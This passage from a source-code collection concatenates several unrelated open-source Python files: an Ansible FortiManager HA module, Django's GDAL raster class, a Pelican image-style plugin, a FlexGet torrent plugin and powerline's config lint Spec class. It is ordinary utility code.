fmgr_ha_hb_threshold=dict(required=False, type="int", default=3),
fmgr_ha_hb_interval=dict(required=False, type="int", default=5),
fmgr_ha_file_quota=dict(required=False, type="int", default=4096),
fmgr_ha_cluster_id=dict(required=False, type="int", default=1)
)
required_if = [
['fmgr_ha_peer_ipv4', 'present', ['fmgr_ha_peer_sn', 'fmgr_ha_peer_status']],
['fmgr_ha_peer_ipv6', 'present', ['fmgr_ha_peer_sn', 'fmgr_ha_peer_status']],
['fmgr_ha_mode', 'master', ['fmgr_ha_cluster_pw', 'fmgr_ha_cluster_id']],
['fmgr_ha_mode', 'slave', ['fmgr_ha_cluster_pw', 'fmgr_ha_cluster_id']],
]
module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=False, required_if=required_if)
paramgram = {
"fmgr_ha_mode": module.params["fmgr_ha_mode"],
"fmgr_ha_cluster_pw": module.params["fmgr_ha_cluster_pw"],
"fmgr_ha_peer_status": module.params["fmgr_ha_peer_status"],
"fmgr_ha_peer_sn": module.params["fmgr_ha_peer_sn"],
"fmgr_ha_peer_ipv4": module.params["fmgr_ha_peer_ipv4"],
"fmgr_ha_peer_ipv6": module.params["fmgr_ha_peer_ipv6"],
"fmgr_ha_hb_threshold": module.params["fmgr_ha_hb_threshold"],
"fmgr_ha_hb_interval": module.params["fmgr_ha_hb_interval"],
"fmgr_ha_file_quota": module.params["fmgr_ha_file_quota"],
"fmgr_ha_cluster_id": module.params["fmgr_ha_cluster_id"],
}
module.paramgram = paramgram
fmgr = None
if module._socket_path:
connection = Connection(module._socket_path)
fmgr = FortiManagerHandler(connection, module)
fmgr.tools = FMGRCommon()
else:
module.fail_json(**FAIL_SOCKET_MSG)
# INIT FLAGS AND COUNTERS
get_ha_peers = 0
results = DEFAULT_RESULT_OBJ
try:
if any(v is not None for v in (paramgram["fmgr_ha_peer_sn"], paramgram["fmgr_ha_peer_ipv4"],
paramgram["fmgr_ha_peer_ipv6"], paramgram["fmgr_ha_peer_status"])):
get_ha_peers = 1
except Exception as err:
raise FMGBaseException(err)
try:
# IF HA MODE IS NOT NULL, SWITCH THAT
if paramgram["fmgr_ha_mode"] is not None:
if (str.lower(paramgram["fmgr_ha_mode"]) != "standalone" and paramgram["fmgr_ha_cluster_pw"] is not None)\
or str.lower(paramgram["fmgr_ha_mode"]) == "standalone":
results = fmgr_set_ha_mode(fmgr, paramgram)
fmgr.govern_response(module=module, results=results, stop_on_success=False,
ansible_facts=fmgr.construct_ansible_facts(results, module.params, paramgram))
elif str.lower(paramgram["fmgr_ha_mode"]) != "standalone" and\
paramgram["fmgr_ha_mode"] is not None and\
paramgram["fmgr_ha_cluster_pw"] is None:
module.exit_json(msg="If setting HA Mode of MASTER or SLAVE, you must specify a cluster password")
except Exception as err:
raise FMGBaseException(err)
# IF GET_HA_PEERS IS ENABLED, LETS PROCESS THE PEERS
try:
if get_ha_peers == 1:
# GET THE CURRENT LIST OF PEERS FROM THE NODE
peers = fmgr_get_ha_peer_list(fmgr)
# GET LENGTH OF RETURNED PEERS LIST AND ADD ONE FOR THE NEXT ID
paramgram["next_peer_id"] = len(peers[1]) + 1
# SET THE ACTUAL NUMBER OF PEERS
num_of_peers = len(peers[1])
# SET THE PEER ID FOR DISABLE METHOD
paramgram["peer_id"] = len(peers) - 1
# SET THE PEER LOOPCOUNT TO 1 TO START THE LOOP
peer_loopcount = 1
# LOOP THROUGH PEERS TO FIND THE SERIAL NUMBER MATCH TO GET THE RIGHT PEER ID
# IDEA BEING WE DON'T WANT TO SUBMIT A BAD peer_id THAT DOESN'T JIVE WITH CURRENT DB ON FMG
# SO LETS SEARCH FOR IT, AND IF WE FIND IT, WE WILL CHANGE THE PEER ID VARIABLES TO MATCH
# IF NOT FOUND, LIFE GOES ON AND WE ASSUME THAT WE'RE ADDING A PEER
# AT WHICH POINT THE next_peer_id VARIABLE WILL HAVE THE RIGHT PRIMARY KEY
if paramgram["fmgr_ha_peer_sn"] is not None:
while peer_loopcount <= num_of_peers:
# GET THE SERIAL NUMBER FOR CURRENT PEER IN LOOP TO COMPARE TO SN IN PLAYBOOK
try:
sn_compare = peers[1][peer_loopcount - 1]["serial-number"]
# IF THE SN IN THE PEERS MATCHES THE PLAYBOOK SN, SET THE IDS
if sn_compare == paramgram["fmgr_ha_peer_sn"]:
paramgram["peer_id"] = peer_loopcount
paramgram["next_peer_id"] = paramgram["peer_id"]
except Exception as err:
raise FMGBaseException(err)
# ADVANCE THE LOOP AND REPEAT UNTIL DONE
peer_loopcount += 1
# IF THE PEER STATUS ISN'T IN THE PLAYBOOK, ASSUME ITS ENABLE
if paramgram["fmgr_ha_peer_status"] is None:
paramgram["fmgr_ha_peer_status"] = "enable"
# IF THE PEER STATUS IS ENABLE, USE THE next_peer_id IN THE API CALL FOR THE ID
if paramgram["fmgr_ha_peer_status"] == "enable":
results = fmgr_set_ha_peer(fmgr, paramgram)
fmgr.govern_response(module=module, results=results, stop_on_success=True,
ansible_facts=fmgr.construct_ansible_facts(results,
module.params, paramgram))
# IF THE PEER STATUS IS DISABLE, WE HAVE TO HANDLE THAT A BIT DIFFERENTLY
# JUST USING TWO DIFFERENT peer_id 's HERE
if paramgram["fmgr_ha_peer_status"] == "disable":
results = fmgr_set_ha_peer(fmgr, paramgram)
fmgr.govern_response(module=module, results=results, stop_on_success=True,
ansible_facts=fmgr.construct_ansible_facts(results, module.params, paramgram))
except Exception as err:
raise FMGBaseException(err)
return module.exit_json(**results[1])
if __name__ == "__main__":
main()
|
zerc/django
|
refs/heads/master
|
django/contrib/gis/gdal/raster/source.py
|
297
|
import json
import os
from ctypes import addressof, byref, c_double, c_void_p
from django.contrib.gis.gdal.base import GDALBase
from django.contrib.gis.gdal.driver import Driver
from django.contrib.gis.gdal.error import GDALException
from django.contrib.gis.gdal.prototypes import raster as capi
from django.contrib.gis.gdal.raster.band import BandList
from django.contrib.gis.gdal.raster.const import GDAL_RESAMPLE_ALGORITHMS
from django.contrib.gis.gdal.srs import SpatialReference, SRSException
from django.contrib.gis.geometry.regex import json_regex
from django.utils import six
from django.utils.encoding import (
force_bytes, force_text, python_2_unicode_compatible,
)
from django.utils.functional import cached_property
class TransformPoint(list):
indices = {
'origin': (0, 3),
'scale': (1, 5),
'skew': (2, 4),
}
def __init__(self, raster, prop):
x = raster.geotransform[self.indices[prop][0]]
y = raster.geotransform[self.indices[prop][1]]
list.__init__(self, [x, y])
self._raster = raster
self._prop = prop
@property
def x(self):
return self[0]
@x.setter
def x(self, value):
gtf = self._raster.geotransform
gtf[self.indices[self._prop][0]] = value
self._raster.geotransform = gtf
@property
def y(self):
return self[1]
@y.setter
def y(self, value):
gtf = self._raster.geotransform
gtf[self.indices[self._prop][1]] = value
self._raster.geotransform = gtf
@python_2_unicode_compatible
class GDALRaster(GDALBase):
"""
Wraps a raster GDAL Data Source object.
"""
def __init__(self, ds_input, write=False):
self._write = 1 if write else 0
Driver.ensure_registered()
# Preprocess json inputs. This converts json strings to dictionaries,
# which are parsed below the same way as direct dictionary inputs.
if isinstance(ds_input, six.string_types) and json_regex.match(ds_input):
ds_input = json.loads(ds_input)
# If input is a valid file path, try setting file as source.
if isinstance(ds_input, six.string_types):
if not os.path.exists(ds_input):
raise GDALException('Unable to read raster source input "{}"'.format(ds_input))
try:
# GDALOpen will auto-detect the data source type.
self._ptr = capi.open_ds(force_bytes(ds_input), self._write)
except GDALException as err:
raise GDALException('Could not open the datasource at "{}" ({}).'.format(ds_input, err))
elif isinstance(ds_input, dict):
# A new raster needs to be created in write mode
self._write = 1
# Create driver (in memory by default)
driver = Driver(ds_input.get('driver', 'MEM'))
# For out of memory drivers, check filename argument
if driver.name != 'MEM' and 'name' not in ds_input:
raise GDALException('Specify name for creation of raster with driver "{}".'.format(driver.name))
# Check if width and height where specified
if 'width' not in ds_input or 'height' not in ds_input:
raise GDALException('Specify width and height attributes for JSON or dict input.')
# Check if srid was specified
if 'srid' not in ds_input:
raise GDALException('Specify srid for JSON or dict input.')
# Create GDAL Raster
self._ptr = capi.create_ds(
driver._ptr,
force_bytes(ds_input.get('name', '')),
ds_input['width'],
ds_input['height'],
ds_input.get('nr_of_bands', len(ds_input.get('bands', []))),
ds_input.get('datatype', 6),
None
)
# Set band data if provided
for i, band_input in enumerate(ds_input.get('bands', [])):
band = self.bands[i]
band.data(band_input['data'])
if 'nodata_value' in band_input:
band.nodata_value = band_input['nodata_value']
# Set SRID
self.srs = ds_input.get('srid')
# Set additional properties if provided
if 'origin' in ds_input:
self.origin.x, self.origin.y = ds_input['origin']
if 'scale' in ds_input:
self.scale.x, self.scale.y = ds_input['scale']
if 'skew' in ds_input:
self.skew.x, self.skew.y = ds_input['skew']
elif isinstance(ds_input, c_void_p):
# Instantiate the object using an existing pointer to a gdal raster.
self._ptr = ds_input
else:
raise GDALException('Invalid data source input type: "{}".'.format(type(ds_input)))
def __del__(self):
if self._ptr and capi:
capi.close_ds(self._ptr)
def __str__(self):
return self.name
def __repr__(self):
"""
Short-hand representation because WKB may be very large.
"""
return '<Raster object at %s>' % hex(addressof(self._ptr))
def _flush(self):
"""
Flush all data from memory into the source file if it exists.
The data that needs flushing are geotransforms, coordinate systems,
nodata_values and pixel values. This function will be called
automatically wherever it is needed.
"""
# Raise an Exception if the value is being changed in read mode.
if not self._write:
raise GDALException('Raster needs to be opened in write mode to change values.')
capi.flush_ds(self._ptr)
@property
def name(self):
"""
Returns the name of this raster. Corresponds to filename
for file-based rasters.
"""
return force_text(capi.get_ds_description(self._ptr))
@cached_property
def driver(self):
"""
Returns the GDAL Driver used for this raster.
"""
ds_driver = capi.get_ds_driver(self._ptr)
return Driver(ds_driver)
@property
def width(self):
"""
Width (X axis) in pixels.
"""
return capi.get_ds_xsize(self._ptr)
@property
def height(self):
"""
Height (Y axis) in pixels.
"""
return capi.get_ds_ysize(self._ptr)
@property
def srs(self):
"""
Returns the SpatialReference used in this GDALRaster.
"""
try:
wkt = capi.get_ds_projection_ref(self._ptr)
if not wkt:
return None
return SpatialReference(wkt, srs_type='wkt')
except SRSException:
return None
@srs.setter
def srs(self, value):
"""
Sets the spatial reference used in this GDALRaster. The input can be
a SpatialReference or any parameter accepted by the SpatialReference
constructor.
"""
if isinstance(value, SpatialReference):
srs = value
elif isinstance(value, six.integer_types + six.string_types):
srs = SpatialReference(value)
else:
raise ValueError('Could not create a SpatialReference from input.')
capi.set_ds_projection_ref(self._ptr, srs.wkt.encode())
self._flush()
@property
def geotransform(self):
"""
Returns the geotransform of the data source.
Returns the default geotransform if it does not exist or has not been
set previously. The default is [0.0, 1.0, 0.0, 0.0, 0.0, -1.0].
"""
# Create empty ctypes double array for data
gtf = (c_double * 6)()
capi.get_ds_geotransform(self._ptr, byref(gtf))
return list(gtf)
@geotransform.setter
def geotransform(self, values):
"Sets the geotransform for the data source."
if sum([isinstance(x, (int, float)) for x in values]) != 6:
raise ValueError('Geotransform must consist of 6 numeric values.')
# Create ctypes double array with input and write data
values = (c_double * 6)(*values)
capi.set_ds_geotransform(self._ptr, byref(values))
self._flush()
@property
def origin(self):
"""
Coordinates of the raster origin.
"""
return TransformPoint(self, 'origin')
@property
def scale(self):
"""
Pixel scale in units of the raster projection.
"""
return TransformPoint(self, 'scale')
@property
def skew(self):
"""
Skew of pixels (rotation parameters).
"""
return TransformPoint(self, 'skew')
@property
def extent(self):
"""
Returns the extent as a 4-tuple (xmin, ymin, xmax, ymax).
"""
# Calculate boundary values based on scale and size
xval = self.origin.x + self.scale.x * self.width
yval = self.origin.y + self.scale.y * self.height
# Calculate min and max values
xmin = min(xval, self.origin.x)
xmax = max(xval, self.origin.x)
ymin = min(yval, self.origin.y)
ymax = max(yval, self.origin.y)
return xmin, ymin, xmax, ymax
@property
def bands(self):
return BandList(self)
def warp(self, ds_input, resampling='NearestNeighbour', max_error=0.0):
"""
Returns a warped GDALRaster with the given input characteristics.
The input is expected to be a dictionary containing the parameters
of the target raster. Allowed values are width, height, SRID, origin,
scale, skew, datatype, driver, and name (filename).
By default, the warp functions keeps all parameters equal to the values
of the original source raster. For the name of the target raster, the
name of the source raster will be used and appended with
_copy. + source_driver_name.
In addition, the resampling algorithm can be specified with the "resampling"
input parameter. The default is NearestNeighbor. For a list of all options
consult the GDAL_RESAMPLE_ALGORITHMS constant.
"""
# Get the parameters defining the geotransform, srid, and size of the raster
if 'width' not in ds_input:
ds_input['width'] = self.width
if 'height' not in ds_input:
ds_input['height'] = self.height
if 'srid' not in ds_input:
ds_input['srid'] = self.srs.srid
if 'origin' not in ds_input:
ds_input['origin'] = self.origin
if 'scale' not in ds_input:
ds_input['scale'] = self.scale
if 'skew' not in ds_input:
ds_input['skew'] = self.skew
# Get the driver, name, and datatype of the target raster
if 'driver' not in ds_input:
ds_input['driver'] = self.driver.name
if 'name' not in ds_input:
ds_input['name'] = self.name + '_copy.' + self.driver.name
if 'datatype' not in ds_input:
ds_input['datatype'] = self.bands[0].datatype()
# Set the number of bands
ds_input['nr_of_bands'] = len(self.bands)
# Create target raster
target = GDALRaster(ds_input, write=True)
# Copy nodata values to warped raster
for index, band in enumerate(self.bands):
target.bands[index].nodata_value = band.nodata_value
# Select resampling algorithm
algorithm = GDAL_RESAMPLE_ALGORITHMS[resampling]
# Reproject image
capi.reproject_image(
self._ptr, self.srs.wkt.encode(),
target._ptr, target.srs.wkt.encode(),
algorithm, 0.0, max_error,
c_void_p(), c_void_p(), c_void_p()
)
# Make sure all data is written to file
target._flush()
return target
def transform(self, srid, driver=None, name=None, resampling='NearestNeighbour',
max_error=0.0):
"""
Returns a copy of this raster reprojected into the given SRID.
"""
# Convert the resampling algorithm name into an algorithm id
algorithm = GDAL_RESAMPLE_ALGORITHMS[resampling]
# Instantiate target spatial reference system
target_srs = SpatialReference(srid)
# Create warped virtual dataset in the target reference system
target = capi.auto_create_warped_vrt(
self._ptr, self.srs.wkt.encode(), target_srs.wkt.encode(),
algorithm, max_error, c_void_p()
)
target = GDALRaster(target)
# Construct the target warp dictionary from the virtual raster
data = {
'srid': srid,
'width': target.width,
'height': target.height,
'origin': [target.origin.x, target.origin.y],
'scale': [target.scale.x, target.scale.y],
'skew': [target.skew.x, target.skew.y],
}
# Set the driver and filepath if provided
if driver:
data['driver'] = driver
if name:
data['name'] = name
# Warp the raster into new srid
return self.warp(data, resampling=resampling, max_error=max_error)
|
prisae/pelican-plugins
|
refs/heads/master
|
better_figures_and_images/better_figures_and_images.py
|
12
|
"""
Better Figures & Images
------------------------
This plugin:
- Adds a style="width: ???px; height: auto;" to each image in the content
- Also adds the width of the contained image to any parent div.figures.
- If RESPONSIVE_IMAGES == True, also adds style="max-width: 100%;"
- Corrects alt text: if alt == image filename, set alt = ''
TODO: Need to add a test.py for this plugin.
"""
from __future__ import unicode_literals
from os import path, access, R_OK
import os
from pelican import signals
from bs4 import BeautifulSoup
from PIL import Image
import pysvg.parser
import logging
logger = logging.getLogger(__name__)
def content_object_init(instance):
if instance._content is not None:
content = instance._content
soup = BeautifulSoup(content, 'html.parser')
for img in soup(['img', 'object']):
logger.debug('Better Fig. PATH: %s', instance.settings['PATH'])
if img.name == 'img':
logger.debug('Better Fig. img.src: %s', img['src'])
img_path, img_filename = path.split(img['src'])
else:
logger.debug('Better Fig. img.data: %s', img['data'])
img_path, img_filename = path.split(img['data'])
logger.debug('Better Fig. img_path: %s', img_path)
logger.debug('Better Fig. img_fname: %s', img_filename)
# Strip off {filename}, |filename| or /static
if img_path.startswith(('{filename}', '|filename|')):
img_path = img_path[10:]
elif img_path.startswith('/static'):
img_path = img_path[7:]
elif img_path.startswith('data:image'):
# Image is encoded in-line (not a file).
continue
else:
logger.warning('Better Fig. Error: img_path should start with either {filename}, |filename| or /static')
# search src path list
# 1. Build the source image filename from PATH
# 2. Build the source image filename from STATIC_PATHS
# if img_path start with '/', remove it.
img_path = os.path.sep.join([el for el in img_path.split("/") if len(el) > 0])
# style: {filename}/static/foo/bar.png
src = os.path.join(instance.settings['PATH'], img_path, img_filename)
src_candidates = [src]
# style: {filename}../static/foo/bar.png
src_candidates += [os.path.join(instance.settings['PATH'], static_path, img_path, img_filename) for static_path in instance.settings['STATIC_PATHS']]
src_candidates = [f for f in src_candidates if path.isfile(f) and access(f, R_OK)]
if not src_candidates:
logger.error('Better Fig. Error: image not found: %s', src)
logger.debug('Better Fig. Skip src: %s', img_path + '/' + img_filename)
continue
src = src_candidates[0]
logger.debug('Better Fig. src: %s', src)
# Open the source image and query dimensions; build style string
try:
if img.name == 'img':
im = Image.open(src)
extra_style = 'width: {}px; height: auto;'.format(im.size[0])
else:
svg = pysvg.parser.parse(src)
extra_style = 'width: {}px; height: auto;'.format(svg.get_width())
except IOError as e:
logger.debug('Better Fig. Failed to open: %s', src)
extra_style = 'width: 100%; height: auto;'
if 'RESPONSIVE_IMAGES' in instance.settings and instance.settings['RESPONSIVE_IMAGES']:
extra_style += ' max-width: 100%;'
if img.get('style'):
img['style'] += extra_style
else:
img['style'] = extra_style
if img.name == 'img':
if img['alt'] == img['src']:
img['alt'] = ''
fig = img.find_parent('div', 'figure')
if fig:
if fig.get('style'):
fig['style'] += extra_style
else:
fig['style'] = extra_style
instance._content = soup.decode()
def register():
signals.content_object_init.connect(content_object_init)
|
v17al/Flexget
|
refs/heads/develop
|
flexget/plugins/modify/torrent.py
|
11
|
from __future__ import unicode_literals, division, absolute_import
import logging
import os
from flexget import plugin
from flexget.event import event
from flexget.utils.bittorrent import Torrent, is_torrent_file
log = logging.getLogger('modif_torrent')
class TorrentFilename(object):
"""
Makes sure that entries containing torrent-file have .torrent
extension. This is enabled always by default (builtins).
"""
TORRENT_PRIO = 255
@plugin.priority(TORRENT_PRIO)
def on_task_modify(self, task, config):
# Only scan through accepted entries, as the file must have been downloaded in order to parse anything
for entry in task.accepted:
# skip if entry does not have file assigned
if not 'file' in entry:
log.trace('%s doesn\'t have a file associated' % entry['title'])
continue
if not os.path.exists(entry['file']):
entry.fail('File %s does not exists' % entry['file'])
continue
if os.path.getsize(entry['file']) == 0:
entry.fail('File %s is 0 bytes in size' % entry['file'])
continue
if not is_torrent_file(entry['file']):
continue
log.debug('%s seems to be a torrent' % entry['title'])
# create torrent object from torrent
try:
with open(entry['file'], 'rb') as f:
# NOTE: this reads entire file into memory, but we're pretty sure it's
# a small torrent file since it starts with TORRENT_RE
data = f.read()
if 'content-length' in entry:
if len(data) != entry['content-length']:
entry.fail('Torrent file length doesn\'t match to the one reported by the server')
self.purge(entry)
continue
# construct torrent object
try:
torrent = Torrent(data)
except SyntaxError as e:
entry.fail('%s - broken or invalid torrent file received' % e.message)
self.purge(entry)
continue
entry['torrent'] = torrent
entry['torrent_info_hash'] = torrent.info_hash
# if we do not have good filename (by download plugin)
# for this entry, try to generate one from torrent content
if entry.get('filename'):
if not entry['filename'].lower().endswith('.torrent'):
# filename present but without .torrent extension, add it
entry['filename'] += '.torrent'
else:
# generate filename from torrent or fall back to title plus extension
entry['filename'] = self.make_filename(torrent, entry)
except Exception as e:
log.exception(e)
@plugin.priority(TORRENT_PRIO)
def on_task_output(self, task, config):
for entry in task.entries:
if 'torrent' in entry:
if entry['torrent'].modified:
# re-write data into a file
log.debug('Writing modified torrent file for %s' % entry['title'])
with open(entry['file'], 'wb+') as f:
f.write(entry['torrent'].encode())
def make_filename(self, torrent, entry):
"""Build a filename for this torrent"""
title = entry['title']
files = torrent.get_filelist()
if len(files) == 1:
# single file, if filename is longer than title use it
fn = files[0]['name']
if len(fn) > len(title):
title = fn[:fn.rfind('.')]
# neatify title
title = title.replace('/', '_')
title = title.replace(' ', '_')
title = title.replace('\u200b', '')
# title = title.encode('iso8859-1', 'ignore') # Damn \u200b -character, how I loathe thee
# TODO: replace only zero width spaces, leave unicode alone?
fn = '%s.torrent' % title
log.debug('make_filename made %s' % fn)
return fn
def purge(self, entry):
if os.path.exists(entry['file']):
log.debug('removing temp file %s from %s' % (entry['file'], entry['title']))
os.remove(entry['file'])
del(entry['file'])
@event('plugin.register')
def register_plugin():
plugin.register(TorrentFilename, 'torrent', builtin=True, api_ver=2)
|
s0undt3ch/powerline
|
refs/heads/develop
|
powerline/lint/spec.py
|
14
|
# vim:fileencoding=utf-8:noet
from __future__ import (unicode_literals, division, absolute_import, print_function)
import itertools
import re
from copy import copy
from powerline.lib.unicode import unicode
from powerline.lint.markedjson.error import echoerr, DelayedEchoErr, NON_PRINTABLE_STR
from powerline.lint.selfcheck import havemarks
NON_PRINTABLE_RE = re.compile(
NON_PRINTABLE_STR.translate({
ord('\t'): None,
ord('\n'): None,
0x0085: None,
})
)
class Spec(object):
'''Class that describes some JSON value
In powerline it is only used to describe JSON values stored in powerline
configuration.
:param dict keys:
Dictionary that maps keys that may be present in the given JSON
dictionary to their descriptions. If this parameter is not empty it
implies that described value has dictionary type. Non-dictionary types
must be described using ``Spec()``: without arguments.
.. note::
Methods that create the specifications return ``self``, so calls to them
may be chained: ``Spec().type(unicode).re('^\w+$')``. This does not
apply to functions that *apply* specification like :py:meth`Spec.match`.
.. note::
Methods starting with ``check_`` return two values: first determines
whether caller should proceed on running other checks, second
determines whether there were any problems (i.e. whether error was
reported). One should not call these methods directly: there is
:py:meth:`Spec.match` method for checking values.
.. note::
In ``check_`` and ``match`` methods specifications are identified by
their indexes for the purpose of simplyfying :py:meth:`Spec.copy`
method.
Some common parameters:
``data``:
Whatever data supplied by the first caller for checker functions. Is not
processed by :py:class:`Spec` methods in any fashion.
``context``:
:py:class:`powerline.lint.context.Context` instance, describes context
of the value. :py:class:`Spec` methods only use its ``.key`` methods for
error messages.
``echoerr``:
Callable that should be used to echo errors. Is supposed to take four
optional keyword arguments: ``problem``, ``problem_mark``, ``context``,
``context_mark``.
``value``:
Checked value.
'''
def __init__(self, **keys):
self.specs = []
self.keys = {}
self.checks = []
self.cmsg = ''
self.isoptional = False
self.uspecs = []
self.ufailmsg = lambda key: 'found unknown key: {0}'.format(key)
self.did_type = False
self.update(**keys)
def update(self, **keys):
'''Describe additional keys that may be present in given JSON value
If called with some keyword arguments implies that described value is
a dictionary. If called without keyword parameters it is no-op.
:return: self.
'''
for k, v in keys.items():
self.keys[k] = len(self.specs)
self.specs.append(v)
if self.keys and not self.did_type:
self.type(dict)
self.did_type = True
return self
def copy(self, copied=None):
'''Deep copy the spec
:param dict copied:
Internal dictionary used for storing already copied values. This
parameter should not be used.
:return: New :py:class:`Spec` object that is a deep copy of ``self``.
'''
copied = copied or {}
try:
return copied[id(self)]
except KeyError:
instance = self.__class__()
copied[id(self)] = instance
return self.__class__()._update(self.__dict__, copied)
def _update(self, d, copied):
'''Helper for the :py:meth:`Spec.copy` function
Populates new instance with values taken from the old one.
:param dict d:
``__dict__`` of the old instance.
:param dict copied:
Storage for already copied values.
'''
self.__dict__.update(d)
self.keys = copy(self.keys)
self.checks = copy(self.checks)
self.uspecs = copy(self.uspecs)
self.specs = [spec.copy(copied) for spec in self.specs]
return self
def unknown_spec(self, keyfunc, spec):
'''Define specification for non-static keys
This method should be used if key names cannot be determined at runtime
or if a number of keys share identical spec (in order to not repeat it).
:py:meth:`Spec.match` method processes dictionary in the given order:
* First it tries to use specifications provided at the initialization or
by the :py:meth:`Spec.update` method.
* If no specification for given key was provided it processes
specifications from ``keyfunc`` argument in order they were supplied.
Once some key matches specification supplied second ``spec`` argument
is used to determine correctness of the value.
:param Spec keyfunc:
:py:class:`Spec` instance or a regular function that returns two
values (the same :py:meth:`Spec.match` returns). This argument is
used to match keys that were not provided at initialization or via
:py:meth:`Spec.update`.
:param Spec spec:
:py:class:`Spec` instance that will be used to check keys matched by
``keyfunc``.
:return: self.
'''
if isinstance(keyfunc, Spec):
self.specs.append(keyfunc)
keyfunc = len(self.specs) - 1
self.specs.append(spec)
self.uspecs.append((keyfunc, len(self.specs) - 1))
return self
def unknown_msg(self, msgfunc):
'''Define message which will be used when unknown key was found
“Unknown” is a key that was not provided at the initialization and via
:py:meth:`Spec.update` and did not match any ``keyfunc`` proided via
:py:meth:`Spec.unknown_spec`.
:param msgfunc:
Function that takes that unknown key as an argument and returns the
message text. Text will appear at the top (start of the sentence).
:return: self.
'''
self.ufailmsg = msgfunc
return self
def context_message(self, msg):
'''Define message that describes context
:param str msg:
Message that describes context. Is written using the
:py:meth:`str.format` syntax and is expected to display keyword
parameter ``key``.
:return: self.
'''
self.cmsg = msg
for spec in self.specs:
if not spec.cmsg:
spec.context_message(msg)
return self
def check_type(self, value, context_mark, data, context, echoerr, types):
'''Check that given value matches given type(s)
:param tuple types:
List of accepted types. Since :py:class:`Spec` is supposed to
describe JSON values only ``dict``, ``list``, ``unicode``, ``bool``,
``float`` and ``NoneType`` types make any sense.
:return: proceed, hadproblem.
'''
havemarks(value)
if type(value.value) not in types:
echoerr(
context=self.cmsg.format(key=context.key),
context_mark=context_mark,
problem='{0!r} must be a {1} instance, not {2}'.format(
value,
', '.join((t.__name__ for t in types)),
type(value.value).__name__
),
problem_mark=value.mark
)
return False, True
return True, False
def check_func(self, value, context_mark, data, context, echoerr, func, msg_func):
'''Check value using given function
:param function func:
Callable that should accept four positional parameters:
#. checked value,
#. ``data`` parameter with arbitrary data (supplied by top-level
caller),
#. current context and
#. function used for echoing errors.
This callable should return three values:
#. determines whether ``check_func`` caller should proceed
calling other checks,
#. determines whether ``check_func`` should echo error on its own
(it should be set to False if ``func`` echoes error itself) and
#. determines whether function has found some errors in the checked
value.
:param function msg_func:
Callable that takes checked value as the only positional parameter
and returns a string that describes the problem. Only useful for
small checker functions since it is ignored when second returned
value is false.
:return: proceed, hadproblem.
'''
havemarks(value)
proceed, echo, hadproblem = func(value, data, context, echoerr)
if echo and hadproblem:
echoerr(context=self.cmsg.format(key=context.key),
context_mark=context_mark,
problem=msg_func(value),
problem_mark=value.mark)
return proceed, hadproblem
def check_list(self, value, context_mark, data, context, echoerr, item_func, msg_func):
'''Check that each value in the list matches given specification
:param function item_func:
Callable like ``func`` from :py:meth:`Spec.check_func`. Unlike
``func`` this callable is called for each value in the list and may
be a :py:class:`Spec` object index.
:param func msg_func:
Callable like ``msg_func`` from :py:meth:`Spec.check_func`. Should
accept one problematic item and is not used for :py:class:`Spec`
object indicies in ``item_func`` method.
:return: proceed, hadproblem.
'''
havemarks(value)
i = 0
hadproblem = False
for item in value:
havemarks(item)
if isinstance(item_func, int):
spec = self.specs[item_func]
proceed, fhadproblem = spec.match(
item,
value.mark,
data,
context.enter_item('list item ' + unicode(i), item),
echoerr
)
else:
proceed, echo, fhadproblem = item_func(item, data, context, echoerr)
if echo and fhadproblem:
echoerr(context=self.cmsg.format(key=context.key + '/list item ' + unicode(i)),
context_mark=value.mark,
problem=msg_func(item),
problem_mark=item.mark)
if fhadproblem:
hadproblem = True
if not proceed:
return proceed, hadproblem
i += 1
return True, hadproblem
def check_either(self, value, context_mark, data, context, echoerr, start, end):
'''Check that given value matches one of the given specifications
:param int start:
First specification index.
:param int end:
Specification index that is greater by 1 then last specification
index.
This method does not give an error if any specification from
``self.specs[start:end]`` is matched by the given value.
'''
havemarks(value)
new_echoerr = DelayedEchoErr(
echoerr,
'One of the either variants failed. Messages from the first variant:',
'messages from the next variant:'
)
hadproblem = False
for spec in self.specs[start:end]:
proceed, hadproblem = spec.match(value, value.mark, data, context, new_echoerr)
new_echoerr.next_variant()
if not proceed:
break
if not hadproblem:
return True, False
new_echoerr.echo_all()
return False, hadproblem
def check_tuple(self, value, context_mark, data, context, echoerr, start, end):
'''Check that given value is a list with items matching specifications
:param int start:
First specification index.
:param int end:
Specification index that is greater by 1 then last specification
index.
This method checks that each item in the value list matches
specification with index ``start + item_number``.
'''
havemarks(value)
hadproblem = False
for (i, item, spec) in zip(itertools.count(), value, self.specs[start:end]):
proceed, ihadproblem = spec.match(
item,
value.mark,
data,
context.enter_item('tuple item ' + unicode(i), item),
echoerr
)
if ihadproblem:
hadproblem = True
if not proceed:
return False, hadproblem
return True, hadproblem
def check_printable(self, value, context_mark, data, context, echoerr, _):
'''Check that given unicode string contains only printable characters
'''
hadproblem = False
for match in NON_PRINTABLE_RE.finditer(value):
hadproblem = True
echoerr(
context=self.cmsg.format(key=context.key),
context_mark=value.mark,
problem='found not printable character U+{0:04x} in a configuration string'.format(
ord(match.group(0))),
problem_mark=value.mark.advance_string(match.start() + 1)
)
return True, hadproblem
def printable(self, *args):
self.type(unicode)
self.checks.append(('check_printable', args))
return self
def type(self, *args):
'''Describe value that has one of the types given in arguments
:param args:
List of accepted types. Since :py:class:`Spec` is supposed to
describe JSON values only ``dict``, ``list``, ``unicode``, ``bool``,
``float`` and ``NoneType`` types make any sense.
:return: self.
'''
self.checks.append(('check_type', args))
return self
cmp_funcs = {
'le': lambda x, y: x <= y,
'lt': lambda x, y: x < y,
'ge': lambda x, y: x >= y,
'gt': lambda x, y: x > y,
'eq': lambda x, y: x == y,
}
cmp_msgs = {
'le': 'lesser or equal to',
'lt': 'lesser then',
'ge': 'greater or equal to',
'gt': 'greater then',
'eq': 'equal to',
}
def len(self, comparison, cint, msg_func=None):
'''Describe value that has given length
:param str comparison:
Type of the comparison. Valid values: ``le``, ``lt``, ``ge``,
``gt``, ``eq``.
:param int cint:
Integer with which length is compared.
:param function msg_func:
Function that should accept checked value and return message that
describes the problem with this value. Default value will emit
something like “length of ['foo', 'bar'] is not greater then 10”.
:return: self.
'''
cmp_func = self.cmp_funcs[comparison]
msg_func = (
msg_func
or (lambda value: 'length of {0!r} is not {1} {2}'.format(
value, self.cmp_msgs[comparison], cint))
)
self.checks.append((
'check_func',
(lambda value, *args: (True, True, not cmp_func(len(value), cint))),
msg_func
))
return self
def cmp(self, comparison, cint, msg_func=None):
'''Describe value that is a number or string that has given property
:param str comparison:
Type of the comparison. Valid values: ``le``, ``lt``, ``ge``,
